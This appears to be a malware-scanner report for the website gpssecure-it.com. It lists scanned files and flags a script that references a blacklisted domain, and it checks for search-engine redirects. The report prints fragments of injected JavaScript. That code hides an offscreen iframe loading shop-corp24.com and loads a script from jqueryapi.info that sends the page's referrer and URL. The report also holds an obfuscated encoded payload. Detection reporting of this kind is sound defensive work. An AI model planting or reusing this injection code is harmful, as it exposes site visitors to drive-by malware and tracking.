20false%29%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20window.attachEvent%28%27onload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0Avar%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0Ajs_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0Ajs_kod2.width%20%3D%20%27180px%27%3B%0Ajs_kod2.height%20%3D%20%27200px%27%3B%0Ajs_kod2.setAttribute%28%27style%27%2C%27position%3Aabsolute%3Bleft%3A-1000px%3Btop%3A-1000px%3Bz-index%3A1%3B%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _1ll=document.createElement('script');_1ll.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1OO=do ...[1393 bytes skipped]...
http://www.gpssecure-it.com/test404page.js	404 Not Found Content-Length: 15670 Content-Type: text/html	malicious
Malicious code found. Script contains blacklisted domain: shop-corp24.com var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4I ...[4099 bytes skipped]... Decoded script: ...[13216 bytes skipped]... 20false%29%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20window.attachEvent%28%27onload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0Avar%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0Ajs_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0Ajs_kod2.width%20%3D%20%27180px%27%3B%0Ajs_kod2.height%20%3D%20%27200px%27%3B%0Ajs_kod2.setAttribute%28%27style%27%2C%27position%3Aabsolute%3Bleft%3A-1000px%3Btop%3A-1000px%3Bz-index%3A1%3B%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _1ll=document.createElement('script');_1ll.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1OO=do ...[1393 bytes skipped]...
http://www.gpssecure-it.com/wp-content/uploads/BHPH.pdf	200 OK Content-Length: 196608 Content-Type: application/pdf	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: gpssecure-it.com

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 11 Oct 2014 14:32:28 GMT
Location: http://www.gpssecure-it.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.gpssecure-it.com/xmlrpc.php
X-Powered-By: PHP/5.2.13

...0 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: gpssecure-it.com
Referer: http://www.google.com/search?q=gpssecure-it.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for gpssecure-it.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools